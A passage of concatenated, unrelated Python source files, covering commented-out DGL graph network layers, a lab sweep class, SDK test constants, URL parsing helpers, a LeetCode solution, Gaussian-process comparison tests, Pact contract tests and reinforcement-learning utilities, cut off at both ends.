gain = torch.nn.init.calculate_gain('relu')
torch.nn.init.xavier_normal_(self.alpha_fc.weight, gain=gain)
torch.nn.init.xavier_normal_(self.beta_fc.weight, gain=gain)
def forward(self, g, h, r):
g.ndata['z'] = h
message_func = dgl.function.u_sub_v('z', 'z', 'm')
reduce_func = dgl.function.sum('m', 'h')
g.update_all(message_func, reduce_func)
h = g.ndata['h']
l = torch.norm(h, p=2, dim=-1, keepdim=True) + 1e-7
dh = (h/l) + 1e-4
'''ha = self.alpha_fc(h)
hb = self.beta_fc(h)
x = r * torch.sin(ha) * torch.cos(hb)
y = r * torch.sin(ha) * torch.sin(hb)
z = r * torch.cos(ha)
dh = torch.cat([x,y,z], dim=-1)'''
return dh
# return h"""
"""class encoder_bead(torch.nn.Module):
def __init__(self, in_dim, hidden_dim, out_dim):
super(encoder_bead, self).__init__()
'''self.layer1 = dgl.nn.GraphConv( in_dim, hidden_dim,
norm='none', weight=True,
allow_zero_in_degree=True)
self.layer2 = dgl.nn.GraphConv( hidden_dim, out_dim,
norm='none', weight=True,
allow_zero_in_degree=True)
self.layer3 = dgl.nn.GraphConv( out_dim, out_dim,
norm='none', weight=True,
allow_zero_in_degree=True)'''
self.layer1 = dgl.nn.SAGEConv( in_dim, hidden_dim, 'lstm',
norm=None)
self.layer2 = dgl.nn.SAGEConv( hidden_dim, out_dim, 'lstm',
norm=None)
self.layer3 = dgl.nn.SAGEConv( out_dim, out_dim, 'lstm',
norm=None)
self.norm = dgl.nn.EdgeWeightNorm(norm='both')
def forward(self, blocks, x, etypes, efeat):
edge_weights = [sub.edata[efeat[0]] for sub in blocks]
# norm_edge_weights = [ self.norm(blocks[i], w) for i, w in enumerate(edge_weights)]
num = x.shape[1]
res = []
for i in np.arange(num):
h = x[:,i,:]
block = blocks[0]
h = self.layer1(block, h, edge_weight=edge_weights[0])
block = blocks[1]
h = self.layer2(block, h, edge_weight=edge_weights[1])
block = blocks[2]
h = self.layer3(block, h, edge_weight=edge_weights[2])
res.append(h)
return torch.stack(res, dim=1)"""
"""class encoder_union(torch.nn.Module):
# src: center -> dst: bead
def __init__(self, in_h1_dim, in_h0_dim, out_dim, in_h1_heads, in_h0_heads, out_heads):
super(encoder_union, self).__init__()
self.layer_merge = dgl.nn.GATConv((in_h1_dim, in_h0_dim), out_dim,
num_heads=in_h0_heads,
allow_zero_in_degree=True)
self.in_h1_heads = in_h1_heads
self.wn_fc = torch.nn.utils.weight_norm( torch.nn.Linear(in_features=in_h0_heads*in_h1_heads, out_features=out_heads) )
gain = torch.nn.init.calculate_gain('relu')
torch.nn.init.xavier_normal_(self.wn_fc.weight, gain=gain)
def normWeight(self, module): #
module.weight.data = torch.softmax(module.weight.data, dim=1)
def forward(self, graph, hier_1, hier_0):
res = []
for i in torch.arange(self.in_h1_heads):
k = self.layer_merge(graph, (hier_1[:,i,:], hier_0))
res.append(k)
res = torch.cat(res, dim=1)
res = torch.transpose(res, 1, 2)
self.normWeight(self.wn_fc)
res = self.wn_fc(res)
res = torch.transpose(res, 1, 2)
return res"""
"""class encoder_union(torch.nn.Module):
# src: center -> dst: bead
def __init__(self, in_h1_dim, in_h0_dim, out_dim, in_h1_heads, in_h0_heads, out_heads):
super(encoder_union, self).__init__()
'''self.layer_merge = dgl.nn.GATConv((in_h1_dim, in_h0_dim), out_dim,
num_heads=in_h0_heads,
allow_zero_in_degree=True)'''
self.layer_merge = MultiHeadMergeLayer(in_h0_dim, in_h1_dim, out_dim, in_h0_heads, merge='stack')
self.in_h1_heads = in_h1_heads
self.wn_fc = torch.nn.Linear(in_features=in_h0_heads*in_h1_heads, out_features=out_heads, bias=False)
gain = torch.nn.init.calculate_gain('relu')
torch.nn.init.xavier_normal_(self.wn_fc.weight, gain=gain)
def normWeight(self, module): #
w = torch.relu(module.weight.data)
module.weight.data = w/(torch.sum(w, dim=0, keepdim=True))
def forward(self, graph, hier_1, hier_0):
res = []
for i in torch.arange(self.in_h1_heads):
k = self.layer_merge(graph, (hier_0, hier_1[:,i,:]))
# k = self.layer_merge(graph, (hier_1[:,i,:], hier_0))
res.append(k)
res = torch.cat(res, dim=2)
'''res = torch.cat(res, dim=1)
res = torch.transpose(res, 1, 2)'''
self.normWeight(self.wn_fc)
res = self.wn_fc(res)
res = torch.transpose(res, 1, 2)
return res"""
"""class MergeLayer(torch.nn.Module):
def __init__(self, in_h0_dim, in_h1_dim, out_dim):
super(MergeLayer, self).__init__()
# src: center h1 -> dst: bead h0
# self.fcsrc = torch.nn.Linear(in_h1_dim, out_dim, bias=False)
self.fcdst = torch.nn.Linear(in_h0_dim, out_dim, bias=False)
self.attn_interacts = torch.nn.Linear(2*out_dim, 1, bias=False)
self.reset_parameters()
def reset_parameters(self):
'''Reinitialize learnable parameters.'''
gain = torch.nn.init.calculate_gain('relu')
# torch.nn.init.xavier_normal_(self.fcsrc.weight, gain=gain)
torch.nn.init.xavier_normal_(self.fcdst.weight, gain=gain)
torch.nn.init.xavier_normal_(self.attn_interacts.weight, gain=gain)
def edge_attention(self, edges):
z2 = torch.cat([edges.src['z'], edges.dst['z']], dim=1)
a = self.attn_interacts(z2)
return {'e': torch.nn.functional.leaky_relu(a)}
def message_func(self, edges):
return {'src_z': edges.src['z'], 'e': edges.data['e'], 'dst_z': edges.dst['z']}
def reduce_func(self, nodes):
alpha = torch.nn.functional.softmax(nodes.mailbox['e'], dim=1)
n = nodes.mailbox['src_z'].shape[1]
h = (torch.mean(nodes.mailbox['dst_z'], dim=1) + n*torch.mean(alpha*(nodes.mailbox['src_z']), dim=1))/(n)
return {'ah': h}
def forward(self, graph, h0, h1):
with graph.local_scope():
# graph.srcdata['z'] = self.fcsrc(h1)
graph.srcdata['z'] = h1
graph.dstdata['z'] = self.fcdst(h0)
graph.apply_edges(self.edge_attention)
graph.update_all(self.message_func, self.reduce_func)
res = graph.ndata.pop('ah')['h0_bead']
return res"""
"""class MultiHeadMergeLayer(torch.nn.Module):
def __init__(self, in_h0_dim, in_h1_dim, out_dim, num_heads, merge='stack'):
super(MultiHeadMergeLayer, self).__init__()
self.heads = torch.nn.ModuleList()
for i in range(num_heads):
self.heads.append(MergeLayer(in_h0_dim, in_h1_dim, out_dim))
self.merge = merge
def forward(self, g, h):
head_outs = [attn_head(g, h[0], h[1]) for attn_head in self.heads]
if self.merge == 'stack':
# stack on the output feature dimension (dim=1)
return torch.stack(head_outs, dim=-1)
else:
# merge using average
return torch.mean(torch.stack(head_outs))"""
"""class decoder(torch.nn.Module):
''' num_heads, num_clusters, ntype, etype '''
def __init__(self, num_heads, num_clusters, ntype, etype):
# True: increasing, Flase: decreasing
super(decoder, self).__init__()
self.num_heads = num_heads
self.num_clusters = num_clusters
self.ntype = ntype
self.etype = etype
num_seq = num_clusters
self.w = torch.nn.Parameter(torch.empty( (self.num_heads)), requires_grad=True)
self.register_parameter('w', self.w)
torch.nn.init.uniform_(self.w, a=0.0, b=1.0)
self.r_dist = torch.nn.Parameter(torch.empty((1, num_seq)), requires_grad=True)
self.register_parameter('r_dist',self.r_dist)
torch.nn.init.uniform_(self.r_dist, a=0.2, b=0.3)
upones = torch.ones((num_seq, num_seq))
upones = torch.triu(upones)
self.upones = torch.nn.Parameter( upones, requires_grad=False)
lowones = torch.ones((num_seq, num_seq))
lowones = torch.triu(lowones, diagonal=1)
self.lowones = torch.nn.Parameter( lowones, requires_grad=False)
self.v_cluster = torch.nn.Parameter( torch.arange(num_clusters, dtype=torch.int32), requires_grad=False)
def dim2_score(self, x):
upper = self.upper_bound - x
lower = x - self.lower_bound
score = 10*(upper*lower)/(self.r_dist**2 + 1)
return score
# def dim3_score(self, x):
# upper = self.upper_bound.view(1,1,-1) - torch.unsqueeze(x, dim=-1)
# lower = torch.unsqueeze(x, dim=-1) - self.lower_bound.view(1,1,-1)
# score = (upper*lower)/(self.r_dist.view(1,1,-1)**2 + 1)
# return score
def edge_distance(self, edges):
n2 = torch.norm((edges.dst['z'] - edges.src['z']), dim=-1, keepdim=False)
weight = torch.nn.functional.softmax(self.w, dim=0)
dist = torch.sum(n2*weight, dim=-1, keepdim=True)
outputs_score = self.dim2_score(dist)
# dist = torch.mean(n2, dim=-1, keepdim=True)
# outputs_score = self.dim2_score(dist)
# score = self.dim3_score(n2)
# prob = torch.softmax(score, dim=-1)
# clusters = torch.sum(prob * self.v_cluster.view(1,1,-1), dim=-1, keepdim=False)
# mean = torch.sum(clusters*weight.view(1,-1), dim=-1, keepdim=True)
# diff = clusters - mean
# std = torch.sqrt(torch.sum(diff**2, dim=-1, keepdim=True))
std = torch.std(n2, dim=-1, unbiased=True, keepdim=False)
return {'dist_pred': outputs_score, 'std': std}
def forward(self, g, h):
with g.local_scope():
g.nodes[self.ntype].data['z'] = h
# r = 10/torch.sum(torch.abs(self.r_dist))
r = self.r_dist.clamp(min=0.1)
self.upper_bound = (torch.matmul(r, self.upones)).clamp(min=0.0, max=15.0) # *r
self.lower_bound = (torch.matmul(r, self.lowones)).clamp(min=0.01, max=15.0) # *r
g.apply_edges(self.edge_distance, etype=self.etype)
return g.edata.pop('dist_pred'), g.edata.pop('std')"""
"""class decoder(torch.nn.Module):
''' num_heads, num_clusters, ntype, etype '''
def __init__(self, num_heads, num_clusters, ntype, etype):
# True: increasing, Flase: decreasing
super(decoder, self).__init__()
self.num_heads = num_heads
self.num_clusters = num_clusters
self.ntype = ntype
self.etype = etype
num_seq = num_clusters
self.w = torch.nn.Parameter(torch.empty( (self.num_heads)), requires_grad=True)
self.register_parameter('w', self.w)
torch.nn.init.uniform_(self.w, a=-10.0, b=10.0)
self.bottom = torch.tensor(0.0, dtype=torch.float32)
self.register_buffer('bottom_const', self.bottom)
self.top = torch.tensor(10.0, dtype=torch.float32)
self.register_buffer('top_const', self.top)
self.drange = torch.linspace(self.bottom_const, 1.0, steps=num_seq-1, dtype=torch.float, requires_grad=True)
self.in_dist = torch.nn.Parameter(self.drange+0.1, requires_grad=True)
self.register_parameter('in_dist', self.in_dist)
# self.in_dist = torch.nn.Parameter( torch.eye(num_step, num_seq-1), requires_grad=True)
# # self.in_dist = torch.nn.Parameter( torch.empty((num_step, num_seq-1)), requires_grad=True)
# # torch.nn.init.uniform_(self.in_dist, a=-10.0, b=10.0)
# self.register_parameter('in_dist', self.in_dist)
mat = torch.diag( -1*torch.ones((num_seq+1)), diagonal=0) + torch.diag( torch.ones((num_seq)), diagonal=-1)
self.subtract_mat = torch.nn.Parameter(mat[:,:-1], requires_grad=False)
def dim2_score(self, x):
upper = self.upper_bound - x
lower = x - self.lower_bound
score = torch.clamp( (4.0*upper*lower)/(self.r_dist**2 + 1), min=-6.0, max=6.0)
score = (torch.nn.functional.sigmoid(score)*2.0-1)*10.0
return score
# def dim3_score(self, x):
# upper = self.upper_bound.view(1,1,-1) - torch.unsqueeze(x, dim=-1)
# lower = torch.unsqueeze(x, dim=-1) - self.lower_bound.view(1,1,-1)
# score = (4.0*upper*lower)/(self.r_dist.view(1,1,-1)**2 + 1.0)
# score = (torch.nn.functional.sigmoid(score)*2.0-1)*10.0
# return score
def edge_distance(self, edges):
n2 = torch.norm((edges.dst['z'] - edges.src['z']), dim=-1, keepdim=False)
weight = torch.nn.functional.softmax(self.w, dim=0)
# score = self.dim3_score(n2)
# outputs_score = torch.sum(score*weight.view(1,-1,1), dim=1)
dist = torch.sum(n2*weight, dim=-1, keepdim=True)
outputs_score = self.dim2_score(dist)
std, mean = torch.std_mean(n2, dim=-1, unbiased=False, keepdim=False)
return {'dist_pred': outputs_score, 'std': std/(mean+1.0)}
def forward(self, g, h):
with g.local_scope():
g.nodes[self.ntype].data['z'] = h
# sorted_in_d = self.in_dist.view(1,-1)
# dist_mat = torch.softmax(self.in_dist, dim=0)
dist = torch.square(self.in_dist) + torch.ones_like(self.in_dist)*0.01
d = torch.cumsum( dist, dim=0)
sorted_in_d = d.clamp(min=0.1, max=20.0).view(1,-1)
# sorted_in_d, _ = torch.sort( in_d, dim=-1)
self.lower_bound = torch.cat( (self.bottom_const.view(1,-1),
sorted_in_d),
dim=1)
self.upper_bound = torch.cat( (sorted_in_d,
self.top_const.view(1,-1)),
dim=1)
self.bound = torch.cat( (self.bottom_const.view(1,-1),
sorted_in_d,
self.top_const.view(1,-1)),
dim=1)
self.r_dist = torch.relu( torch.matmul(self.bound, self.subtract_mat) )
g.apply_edges(self.edge_distance, etype=self.etype)
return g.edata.pop('dist_pred'), g.edata.pop('std')"""
|
import numpy as np
from tqdm.auto import tqdm
import matplotlib.pyplot as plt
import pandas as pd
from argent.live_plot import LivePlot
class Sweep:
def __init__(self, client, x, start, stop, steps, averages=1, sweeps=1, plot=None, legend=None):
''' Run a sweep across one or more variables.
Arguments:
client: handle to argent.Client
x (str): name of independent variable to sweep
start (float): beginning of sweep
stop (float): end of sweep
steps (int): number of steps in sweep
averages (int): cycles to be repeated at each sweep point to gather statistics
sweeps (int): number of sweeps to perform
plot (str): a variable name can be passed to this argument to display a live plot
legend (list): an optional second variable to iterate over. Should be a list with two elements,
where the first is the name of the variable and the second is the set of points to try.
Example: legend=['z', (0, 1, 2, 3)]
'''
self.x = x
self.start = start
self.stop = stop
self.steps = steps
self.client = client
self.sweeps = sweeps
self.averages = averages
self.y = plot
self.dataset = self.client.dataset()
self.legend = legend
if plot is not None:
self.progress_plot = LivePlot(client, x, plot, xlim=[start, stop], legend=legend)
self.run()
def run(self):
sweep_points = np.linspace(self.start, self.stop, self.steps)
if self.y is None:
            sweep_points = tqdm(sweep_points)  # show a progress bar if no variable is designated for plotting
if self.legend is None:
for _ in range(self.sweeps):
for point in sweep_points:
self.client.set(self.x, point)
self.client.collect(self.averages)
                    if self.y is not None:
                        self.progress_plot.update()
else:
for z0 in self.legend[1]:
self.client.set(self.legend[0], z0)
for _ in range(self.sweeps):
for point in sweep_points:
self.client.set(self.x, point)
self.client.collect(self.averages)
                            if self.y is not None:
                                self.progress_plot.update()
self.dataset.stop()
def save(self, filename):
self.dataset.data.to_csv(filename)
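# Minimal usage sketch (assumes `client` is an argent.Client handle and that variables named 'x' and
# 'y' exist in the sequence; constructing the Sweep runs it immediately):
#   sweep = Sweep(client, 'x', start=0.0, stop=1.0, steps=11, averages=3, plot='y')
#   sweep.save('sweep.csv')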
|
# resource constants
# some minor setup required to run in record mode
# - actual subsid to be used
# - rg must exist
# - vnet must exist
TEST_RG='sdk-py-tests-rg'
TEST_ACC_1='sdk-py-tests-acc-1'
TEST_ACC_2='sdk-py-tests-acc-2'
TEST_POOL_1='sdk-py-tests-pool-1'
TEST_POOL_2='sdk-py-tests-pool-2'
TEST_VOL_1='sdk-py-tests-vol-1'
TEST_VOL_2='sdk-py-tests-vol-2'
TEST_SNAPSHOT_1='sdk-py-tests-snapshot-1'
TEST_SNAPSHOT_2='sdk-py-tests-snapshot-2'
DEFAULT_SIZE=4398046511104
GIGABYTE=1024 * 1024 * 1024
SUBSID='subsid'
SERVICE_LEVEL='Premium'
LOCATION='westus2'
VNET='sdk-py-tests-rg-vnet'
|
# helper_module.py
# -*- coding: utf8 -*-
# vim:fileencoding=utf8 ai ts=4 sts=4 et sw=4
# Copyright 2016 National Research Foundation (South African Radio Astronomy Observatory)
# BSD license - see LICENSE for details
from __future__ import absolute_import, division, print_function
from future import standard_library
standard_library.install_aliases()
import os
import sys
def get_server_name():
"""Gets the TANGO server name from the command line arguments
Returns
=======
server_name : str
tango device server name
Note
====
Extract the Tango server_name or equivalent executable
    (e.g. sim_xmi_parser.py -> sim_xmi_parser or
/usr/local/bin/mkat-tango-katcpdevice2tango-DS ->
mkat-tango-katcpdevice2tango-DS) from the command line
arguments passed, where sys.argv[0] is the server executable name
and sys.argv[1] is the server instance.
"""
executable_name = os.path.split(sys.argv[0])[-1].split(".")[0]
server_name = executable_name + "/" + sys.argv[1]
return server_name
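# Example (following the docstring above; the instance name is illustrative):
#   running `python sim_xmi_parser.py test_instance` makes get_server_name() return
#   'sim_xmi_parser/test_instance'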
|
from urllib.parse import urlparse
#get domain name (example.com)
def get_domain_name(url):
try:
results = get_sub_domain_name(url).split('.')
return results[-2] + '.' + results[-1]
except:
return ''
#get sub domain name (name.example.com)
def get_sub_domain_name(url):
    try:
        # parse the url with urlparse (python stdlib function) and return the network location
        return urlparse(url).netloc
except:
return ''
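# Illustrative usage:
#   get_sub_domain_name('https://name.example.com/path')  # -> 'name.example.com'
#   get_domain_name('https://name.example.com/path')      # -> 'example.com'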
|
class Solution:
# @param matrix, a list of lists of integers
# RETURN NOTHING, MODIFY matrix IN PLACE.
def setZeroes(self, matrix):
x = len(matrix)
if x > 0:
y = len(matrix[0])
else:
y = 0
rows = [1]*x
cols = [1]*y
for i in range(x):
for j in range(y):
if matrix[i][j] == 0:
rows[i] = 0
cols[j] = 0
for i in range(x):
if rows[i] == 0:
for j in range(y):
matrix[i][j] = 0
for j in range(y):
if cols[j] == 0:
for i in range(x):
matrix[i][j] = 0
m = [[1,1,1],[0,1,2]]
s = Solution()
s.setZeroes(m)
print(m)
|
import bayesnewton
import objax
from bayesnewton.utils import inv
import numpy as np
from jax.config import config
config.update("jax_enable_x64", True)
import pytest
import tensorflow as tf
import gpflow
import scipy as sp
import pickle
gpflow.config.set_default_jitter(1e-20)
train_data = pickle.load(open(f'../experiments/shutters/data/train_data_0_0.pickle', "rb"))
pred_data = pickle.load(open(f'../experiments/shutters/data/pred_data_0_0.pickle', "rb"))
pred_data = pred_data['grid']
X = train_data['X']
Y = train_data['Y']
X_test = pred_data['X']
Y_test = pred_data['Y']
def initialise_newt_model(var_f, len_f, var_y, x, y):
r = np.unique(x[:, 1])
print(r)
kernel = bayesnewton.kernels.SpatioTemporalMatern52(variance=var_f, lengthscale_time=len_f, lengthscale_space=len_f, z=r)
likelihood = bayesnewton.likelihoods.Gaussian(variance=var_y)
model = bayesnewton.models.VariationalGP(kernel=kernel, likelihood=likelihood, X=x, Y=y)
return model
# def init_as_cvi(kern, Z_all):
# M = Z_all.shape[0]
#
# Kzz = kern(Z_all, Z_all)
#
# # def inv(K):
# # K_chol = sp.linalg.cholesky(K+1e-3*np.eye(M), lower=True)
# # return sp.linalg.cho_solve((K_chol, True), np.eye(K.shape[0]))
#
# #manual q(u) decompositin
# nat1 = np.zeros([M, 1])
# nat2 = inv(Kzz)
#
# lam1 = np.zeros([M, 1])
# lam2 = 1e-2*np.eye(M)
#
# # S = inv(-2*(nat2+lam2))
# S = inv(nat2+lam2)
# m = S @ (lam1 + nat1)
#
# S_chol = sp.linalg.cholesky(S+1e-8*np.eye(M), lower=True)
# S_flattened = S_chol[np.tril_indices(M, 0)]
#
# q_mu = m
# q_sqrt = np.array([S_chol])
# return q_mu, q_sqrt
def initialise_gpflow_model(var_f, len_f, var_y, x, y):
N = x.shape[0]
k0 = gpflow.kernels.Matern52(lengthscales=[len_f], variance=var_f, active_dims=[0], name='matern1')
k1 = gpflow.kernels.Matern52(lengthscales=[len_f], variance=1., active_dims=[1], name='matern2')
k = k0 * k1
# find the m and S that correspond to the same natural parameters used by CVI
K_xx = np.array(k(x, x))
K_xx_inv = inv(K_xx)
print(x.shape)
S = inv(K_xx_inv + 1e-2 * np.eye(N))
S_chol = np.linalg.cholesky(S)
S_chol_init = np.array([S_chol])
# S_chol_flattened_init = np.array(S_chol[np.tril_indices(N, 0)])
lambda_init = np.zeros((N, 1))
m_init = S @ lambda_init
lik = gpflow.likelihoods.Gaussian(variance=var_y)
# data = (x, y)
# print(x)
model = gpflow.models.SVGP(
inducing_variable=x,
whiten=False,
kernel=k,
mean_function=None,
likelihood=lik,
q_mu=m_init,
q_sqrt=S_chol_init
)
gpflow.utilities.set_trainable(model.inducing_variable.Z, False)
gpflow.utilities.set_trainable(model.q_mu, False)
gpflow.utilities.set_trainable(model.q_sqrt, False)
return model
@pytest.mark.parametrize('var_f', [1., 5.])
@pytest.mark.parametrize('len_f', [0.1, 0.025])
@pytest.mark.parametrize('var_y', [0.1, 0.3])
def test_initial_loss(var_f, len_f, var_y):
"""
test whether newt's VI and gpflow's SVGP (Z=X) give the same initial ELBO and posterior
"""
newt_model = initialise_newt_model(var_f, len_f, var_y, X, Y)
gpflow_model = initialise_gpflow_model(var_f, len_f, var_y, X, Y)
newt_model.update_posterior()
loss_newt = newt_model.energy()
# _, _, expected_density = newt_model.inference(newt_model)
print(loss_newt)
# print(expected_density)
data = (X, Y)
f_mean, f_var = gpflow_model.predict_f(X)
var_exp = np.sum(gpflow_model.likelihood.variational_expectations(f_mean, f_var, Y))
loss_gpflow = -gpflow_model.elbo(data)
print(loss_gpflow.numpy())
# print(var_exp)
# print(posterior_mean - f_mean[:, 0])
np.testing.assert_allclose(np.squeeze(newt_model.posterior_mean.value), f_mean[:, 0], rtol=1e-4)
np.testing.assert_allclose(np.squeeze(newt_model.posterior_variance.value), f_var[:, 0], rtol=1e-4)
np.testing.assert_almost_equal(loss_newt, loss_gpflow.numpy(), decimal=2)
@pytest.mark.parametrize('var_f', [1., 5.])
@pytest.mark.parametrize('len_f', [0.1, 0.025])
@pytest.mark.parametrize('var_y', [0.1, 0.3])
def test_gradient_step(var_f, len_f, var_y):
"""
test whether newt's VI and gpflow's SVGP (Z=X) provide the same initial gradient step in the hyperparameters
"""
# x, y = build_data(N)
newt_model = initialise_newt_model(var_f, len_f, var_y, X, Y)
gpflow_model = initialise_gpflow_model(var_f, len_f, var_y, X, Y)
gv = objax.GradValues(newt_model.energy, newt_model.vars())
lr_adam = 0.1
lr_newton = 1.
opt = objax.optimizer.Adam(newt_model.vars())
newt_model.update_posterior()
newt_grads, value = gv() # , lr=lr_newton)
loss_ = value[0]
opt(lr_adam, newt_grads)
newt_hypers = np.array([newt_model.kernel.temporal_lengthscale, newt_model.kernel.spatial_lengthscale,
newt_model.kernel.variance, newt_model.likelihood.variance])
print(newt_hypers)
print(newt_grads)
adam_opt = tf.optimizers.Adam(lr_adam)
data = (X, Y)
with tf.GradientTape() as tape:
loss = -gpflow_model.elbo(data)
_vars = gpflow_model.trainable_variables
gpflow_grads = tape.gradient(loss, _vars)
loss_fn = gpflow_model.training_loss_closure(data)
adam_vars = gpflow_model.trainable_variables
adam_opt.minimize(loss_fn, adam_vars)
gpflow_hypers = np.array([gpflow_model.kernel.lengthscales.numpy()[0],
gpflow_model.kernel.lengthscales.numpy()[1],
gpflow_model.kernel.variance.numpy(),
gpflow_model.likelihood.variance.numpy()])
print(gpflow_hypers)
print(gpflow_grads)
np.testing.assert_allclose(newt_grads[0], gpflow_grads[0], atol=1e-2) # use atol since values are so small
np.testing.assert_allclose(newt_grads[1], gpflow_grads[1], rtol=1e-2)
np.testing.assert_allclose(newt_grads[2], gpflow_grads[2], rtol=1e-2)
# @pytest.mark.parametrize('var_f', [0.5, 1.5])
# @pytest.mark.parametrize('len_f', [0.75, 2.5])
# @pytest.mark.parametrize('var_y', [0.1, 0.5])
# def test_inference_step(var_f, len_f, var_y):
# """
# test whether newt's VI and gpflow's SVGP (Z=X) give the same posterior after one natural gradient step
# """
#
# # x, y = build_data(N)
#
# newt_model = initialise_newt_model(var_f, len_f, var_y, X, Y)
# gpflow_model = initialise_gpflow_model(var_f, len_f, var_y, X, Y)
#
# lr_newton = 1.
#
# newt_model.update_posterior()
# newt_loss = inf(newt_model, lr=lr_newton) # update variational params
# newt_model.update_posterior()
#
# data = (X, Y[:, None)
# with tf.GradientTape() as tape:
# loss = -gpflow_model.elbo(data)
#
# variational_vars = [(gpflow_model.q_mu, gpflow_model.q_sqrt)]
# natgrad_opt = gpflow.optimizers.NaturalGradient(gamma=lr_newton)
# loss_fn = gpflow_model.training_loss_closure(data)
# natgrad_opt.minimize(loss_fn, variational_vars)
#
# f_mean, f_var = gpflow_model.predict_f(X)
#
# # print(post_mean_)
# # print(f_mean[:, 0])
#
# np.testing.assert_allclose(np.squeeze(newt_model.posterior_mean.value), f_mean[:, 0], rtol=1e-3)
# np.testing.assert_allclose(np.squeeze(newt_model.posterior_variance.value), f_var[:, 0], rtol=1e-3)
var_f = 1
len_f = 1
var_y = 0.1
newt_model = initialise_newt_model(var_f, len_f, var_y, X, Y)
gpflow_model = initialise_gpflow_model(var_f, len_f, var_y, X, Y)
newt_model.update_posterior()
loss_newt = newt_model.energy()
# _, _, expected_density = newt_model.inference(newt_model)
print(loss_newt)
# print(expected_density)
data = (X, Y)
f_mean, f_var = gpflow_model.predict_f(X)
var_exp = np.sum(gpflow_model.likelihood.variational_expectations(f_mean, f_var, Y))
loss_gpflow = -gpflow_model.elbo(data)
print(loss_gpflow.numpy())
# print(var_exp)
# print(posterior_mean - f_mean[:, 0])
# np.testing.assert_allclose(np.squeeze(newt_model.posterior_mean.value), f_mean[:, 0], rtol=1e-4)
# np.testing.assert_allclose(np.squeeze(newt_model.posterior_variance.value), f_var[:, 0], rtol=1e-4)
# np.testing.assert_almost_equal(loss_newt, loss_gpflow.numpy(), decimal=2)
|
#!/usr/bin/env python3
import atexit
import requests
from pact import Consumer, Provider
pact = Consumer('sandwich-maker').has_pact_with(Provider('Butterer'))
pact.start_service()
atexit.register(pact.stop_service)
PACT_BASE_URL = 'http://localhost:1234'
BREAD_AND_BUTTER = 'bread and butter'
def test_buttering():
(pact
.given('We want to butter bread')
.upon_receiving('a request to butter bread')
.with_request('get', '/butter/bread')
.will_respond_with(200, body=BREAD_AND_BUTTER))
with pact:
result = requests.get(f'{PACT_BASE_URL}/butter/bread')
assert result.text == 'bread and butter'
def test_buttering_twice():
(pact
.given('We want to butter bread again')
.upon_receiving('a request to butter buttered bread')
.with_request('get', '/butter/bread%20and%20butter')
.will_respond_with(200, body=BREAD_AND_BUTTER))
with pact:
result = requests.get(f'{PACT_BASE_URL}/butter/bread%20and%20butter')
assert result.text == 'bread and butter'
|
import os
import torch
import torch.nn.functional as F
import torch.distributed as dist
from torch.autograd import Variable
import numpy as np
import json
import cv2
CONFIG_PATH = os.getcwd()+'/../assets/config.ymal'
def within_bound(p,shape,r=0):
""" check if point p [y;x] or [y;x;theta] with radius r is inside world of shape (h,w)
return bool if p is single point | return bool matrix (vector) if p: [y;x] where y & x are matrix (vector) """
return (p[0] >= r) & (p[0] < shape[0]-r) & (p[1] >= r) & (p[1] < shape[1]-r)
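# Illustrative check: a point at (5, 5) with radius 1 lies inside a 10x10 world,
# so within_bound(np.array([5, 5]), (10, 10), r=1) evaluates to True.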
# https://github.com/ikostrikov/pytorch-ddpg-naf/blob/master/ddpg.py#L11
def soft_update(target, source, tau):
"""
Perform DDPG soft update (move target params toward source based on weight
factor tau)
Inputs:
target (torch.nn.Module): Net to copy parameters to
source (torch.nn.Module): Net whose parameters to copy
tau (float, 0 < x < 1): Weight factor for update
"""
for target_param, param in zip(target.parameters(), source.parameters()):
target_param.data.copy_(target_param.data * (1.0 - tau) + param.data * tau)
# https://github.com/ikostrikov/pytorch-ddpg-naf/blob/master/ddpg.py#L15
def hard_update(target, source):
"""
Copy network parameters from source to target
Inputs:
target (torch.nn.Module): Net to copy parameters to
source (torch.nn.Module): Net whose parameters to copy
"""
for target_param, param in zip(target.parameters(), source.parameters()):
target_param.data.copy_(param.data)
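# Minimal usage sketch (assumes `actor` and `target_actor` are torch.nn.Module instances with
# identical architectures):
#   hard_update(target_actor, actor)        # start the target as an exact copy of the source
#   soft_update(target_actor, actor, 0.01)  # then nudge the target toward the source each update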
# https://github.com/seba-1511/dist_tuto.pth/blob/gh-pages/train_dist.py
def average_gradients(model):
""" Gradient averaging. """
size = float(dist.get_world_size())
for param in model.parameters():
dist.all_reduce(param.grad.data, op=dist.reduce_op.SUM, group=0)
param.grad.data /= size
# https://github.com/seba-1511/dist_tuto.pth/blob/gh-pages/train_dist.py
def init_processes(rank, size, fn, backend='gloo'):
""" Initialize the distributed environment. """
os.environ['MASTER_ADDR'] = '127.0.0.1'
os.environ['MASTER_PORT'] = '29500'
dist.init_process_group(backend, rank=rank, world_size=size)
fn(rank, size)
def onehot_from_action(actions):
onehot = np.zeros((len(actions),8))
for i,action in enumerate(actions):
onehot[i,action] = 1
return onehot
def onehot_from_logits(logits, eps=0.0):
"""
Given batch of logits, return one-hot sample using epsilon greedy strategy
(based on given epsilon)
"""
# get best (according to current policy) actions in one-hot form
argmax_acs = (logits == logits.max(1, keepdim=True)[0]).float()
if eps == 0.0:
return argmax_acs
# get random actions in one-hot form
rand_acs = Variable(torch.eye(logits.shape[1])[[np.random.choice(
range(logits.shape[1]), size=logits.shape[0])]], requires_grad=False)
# chooses between best and random actions using epsilon greedy
return torch.stack([argmax_acs[i] if r > eps else rand_acs[i] for i, r in
enumerate(torch.rand(logits.shape[0]))])
# modified for PyTorch from https://github.com/ericjang/gumbel-softmax/blob/master/Categorical%20VAE.ipynb
def sample_gumbel(shape, eps=1e-20, tens_type=torch.FloatTensor):
"""Sample from Gumbel(0, 1)"""
U = Variable(tens_type(*shape).uniform_(), requires_grad=False)
return -torch.log(-torch.log(U + eps) + eps)
# modified for PyTorch from https://github.com/ericjang/gumbel-softmax/blob/master/Categorical%20VAE.ipynb
def gumbel_softmax_sample(logits, temperature):
""" Draw a sample from the Gumbel-Softmax distribution"""
y = logits + sample_gumbel(logits.shape, tens_type=type(logits.data))
return F.softmax(y / temperature, dim=1)
# modified for PyTorch from https://github.com/ericjang/gumbel-softmax/blob/master/Categorical%20VAE.ipynb
def gumbel_softmax(logits, temperature=1.0, hard=False):
"""Sample from the Gumbel-Softmax distribution and optionally discretize.
Args:
logits: [batch_size, n_class] unnormalized log-probs
temperature: non-negative scalar
hard: if True, take argmax, but differentiate w.r.t. soft sample y
Returns:
[batch_size, n_class] sample from the Gumbel-Softmax distribution.
If hard=True, then the returned sample will be one-hot, otherwise it will
      be a probability distribution that sums to 1 across classes
"""
y = gumbel_softmax_sample(logits, temperature)
if hard:
